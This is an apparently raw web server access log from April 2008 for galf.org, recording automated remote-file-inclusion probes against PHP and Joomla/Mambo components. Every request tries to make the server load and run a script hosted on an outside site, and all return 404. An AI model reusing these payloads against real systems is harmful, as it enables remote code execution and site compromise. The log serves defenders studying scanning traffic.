212.174.24.65 - - [06/Apr/2008:17:16:46 -0700] "GET /logs/access_080310.log//skin/zero_vote/ask_password.php?dir=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:16:54 -0700] "GET /logs/access_071015.log/index.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:16:54 -0700] "GET /index.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:16:54 -0700] "GET /logs/index.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.75.141.104 - - [06/Apr/2008:17:17:38 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.141.104 - - [06/Apr/2008:17:17:38 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:18:05 -0700] "GET /logs/access_071224.log/index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.133.62 - - [06/Apr/2008:17:18:08 -0700] "GET /logs/access.log/index.php?redir=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.133.62 - - [06/Apr/2008:17:18:08 -0700] "GET /logs/index.php?redir=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:18:12 -0700] "GET /logs/index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.242.100 - - [06/Apr/2008:17:18:27 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/s.memek/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.242.100 - - [06/Apr/2008:17:18:28 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.139.131.212 - - [06/Apr/2008:17:18:36 -0700] "GET /logs/access_071015.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.139.131.212 - - [06/Apr/2008:17:18:37 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.139.131.212 - - [06/Apr/2008:17:18:37 -0700] "GET /logs/access_071015.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.139.131.212 - - [06/Apr/2008:17:18:38 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.139.131.212 - - [06/Apr/2008:17:18:38 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.139.131.212 - - [06/Apr/2008:17:18:39 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:18:57 -0700] "GET /logs/access.log/index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
205.234.253.11 - - [06/Apr/2008:17:19:00 -0700] "GET /index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
205.234.253.11 - - [06/Apr/2008:17:19:05 -0700] "GET /logs/index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:17:19:15 -0700] "GET /logs/access_080113.log/index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:19:16 -0700] "GET /index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:19:16 -0700] "GET /logs/index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.139.131.212 - - [06/Apr/2008:17:19:18 -0700] "GET /logs/access_070917.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:19:22 -0700] "GET /logs/access_071217.log/index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.139.131.212 - - [06/Apr/2008:17:19:22 -0700] "GET /logs/access_070917.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:19:54 -0700] "GET /logs/access_080310.log/index.php?meio=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:19:54 -0700] "GET /index.php?meio=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:19:55 -0700] "GET /logs/index.php?meio=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:19:57 -0700] "GET /logs/access.log/index.php?configFile=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
205.234.253.11 - - [06/Apr/2008:17:19:58 -0700] "GET /index.php?configFile=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
205.234.253.11 - - [06/Apr/2008:17:19:58 -0700] "GET /logs/index.php?configFile=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
200.139.131.212 - - [06/Apr/2008:17:20:17 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.139.131.212 - - [06/Apr/2008:17:20:18 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [06/Apr/2008:17:20:19 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [06/Apr/2008:17:20:20 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:20:27 -0700] "GET /logs/access.log/index.php?meio=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:21:06 -0700] "GET /logs/access.log/index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:17:21:06 -0700] "GET /index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:17:21:06 -0700] "GET /logs/index.php?principal=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
195.74.65.15 - - [06/Apr/2008:17:21:54 -0700] "GET /index.php?meio=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.74.65.15 - - [06/Apr/2008:17:21:54 -0700] "GET /index.php?meio=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:22:35 -0700] "GET /logs/access_070730.log/index.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.88.114.169 - - [06/Apr/2008:17:23:14 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
203.88.114.169 - - [06/Apr/2008:17:23:14 -0700] "GET //skin/zero_vote/login.php?dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:17:23:40 -0700] "GET /logs/access_080107.log//components/com_forum/download.php?phpbb_root_path=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:17:23:40 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:17:23:40 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:24:26 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
75.125.145.66 - - [06/Apr/2008:17:24:27 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:24:55 -0700] "GET /logs/access_080113.log/index.php?doc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:24:56 -0700] "GET /index.php?doc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:24:56 -0700] "GET /logs/index.php?doc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:25:08 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:25:08 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:25:09 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.37.186.93 - - [06/Apr/2008:17:27:35 -0700] "GET /head.php?path=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:28:11 -0700] "GET /logs/access_070806.log/index.php?open=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.238.233 - - [06/Apr/2008:17:28:16 -0700] "GET /logs/access_071119.log/akocomments.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.238.233 - - [06/Apr/2008:17:28:17 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.238.233 - - [06/Apr/2008:17:28:17 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:29:14 -0700] "GET /logs/access.log/index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:29:15 -0700] "GET /index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:29:15 -0700] "GET /logs/index.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:29:34 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:29:36 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.169.176.162 - - [06/Apr/2008:17:29:37 -0700] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.hitmixwebhosting.de//administrator/components/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
81.169.176.162 - - [06/Apr/2008:17:29:37 -0700] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.hitmixwebhosting.de//administrator/components/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
64.34.169.20 - - [06/Apr/2008:17:30:01 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.92.148.158 - - [06/Apr/2008:17:30:01 -0700] "GET /logs/access_070903.log/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.92.148.158 - - [06/Apr/2008:17:30:01 -0700] "GET /contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.92.148.158 - - [06/Apr/2008:17:30:02 -0700] "GET /logs/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:17:30:21 -0700] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.141.104 - - [06/Apr/2008:17:30:38 -0700] "GET /logs/access_071119.log/akocomments.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.169.20 - - [06/Apr/2008:17:31:05 -0700] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:31:07 -0700] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:31:09 -0700] "GET /index2.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:31:24 -0700] "GET /logs/access_080113.log/index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:31:25 -0700] "GET /index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.253.11 - - [06/Apr/2008:17:31:25 -0700] "GET /logs/index.php?nic=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.92.148.158 - - [06/Apr/2008:17:31:39 -0700] "GET /logs/access_070826.log/contenido/includes/include.con_subnav.php?cfg[path][contenido]=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.169.20 - - [06/Apr/2008:17:31:49 -0700] "GET /logs/access_071015.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.169.20 - - [06/Apr/2008:17:31:49 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.169.20 - - [06/Apr/2008:17:31:49 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.169.20 - - [06/Apr/2008:17:32:01 -0700] "GET /logs/access_070917.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.226.60.4 - - [06/Apr/2008:17:32:03 -0700] "GET /logs/access_071022.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.226.60.4 - - [06/Apr/2008:17:32:04 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.226.60.4 - - [06/Apr/2008:17:32:05 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:32:05 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:32:18 -0700] "GET /logs/access_071015.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:32:18 -0700] "GET /logs/access_071015.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:32:18 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:32:18 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:32:19 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:32:19 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.238.233 - - [06/Apr/2008:17:32:24 -0700] "GET /logs/access_070820.log/akocomments.php?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:32:30 -0700] "GET /logs/access_071015.log/index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:32:30 -0700] "GET /index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:32:31 -0700] "GET /logs/index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:32:33 -0700] "GET /logs/access_070917.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.67.38 - - [06/Apr/2008:17:32:33 -0700] "GET /logs/access_070917.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.238.233 - - [06/Apr/2008:17:32:39 -0700] "GET /logs/access_080114.log//index.php/?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.238.233 - - [06/Apr/2008:17:32:39 -0700] "GET //index.php/?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.238.233 - - [06/Apr/2008:17:32:39 -0700] "GET /logs//index.php/?mosConfig_absolute_path=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:32:54 -0700] "GET /logs/access.log/main.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:32:54 -0700] "GET /main.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.192.39 - - [06/Apr/2008:17:32:54 -0700] "GET /logs/main.php?page=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:33:02 -0700] "GET /logs/access.log/index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:17:33:02 -0700] "GET /index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:17:33:03 -0700] "GET /logs/index.php?arquivo=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
74.220.215.233 - - [06/Apr/2008:17:34:04 -0700] "GET /logs/access_071015.log/index.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:34:05 -0700] "GET /index.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:34:05 -0700] "GET /logs/index.php?inc=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:34:08 -0700] "GET /logs/access_071210.log/index.php?rage=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:34:08 -0700] "GET /index.php?rage=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:17:34:08 -0700] "GET /logs/index.php?rage=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
